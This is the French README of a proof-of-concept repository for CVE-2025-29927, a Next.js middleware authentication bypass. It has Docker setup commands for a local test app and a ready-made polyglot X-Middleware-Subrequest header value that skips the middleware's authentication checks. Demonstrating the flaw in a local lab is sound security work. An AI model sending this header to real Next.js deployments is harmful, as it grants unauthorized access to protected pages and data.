
PoC pour CVE-2025-29927 : vulnérabilité de contournement du middleware Next.js. Démontre comment x-middleware-subrequest peut contourner les contrôles d'authentification. Inclut une configuration Docker pour les tests.
Ce dépôt démontre la vulnérabilité CVE-2025-29927 dans Next.js, où l'en-tête interne x-middleware-subrequest peut être utilisé pour contourner les contrôles du middleware comme l'authentification.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env :NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Nous pouvons grandement simplifier l'exploitation de ce problème en utilisant un polyglotte qui nous permet de couvrir efficacement les différents cas potentiels. Nous y sommes parvenus grâce à l'en-tête HTTP suivant, utilisé pour vérifier la présence d'un contournement de l'authentification :
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

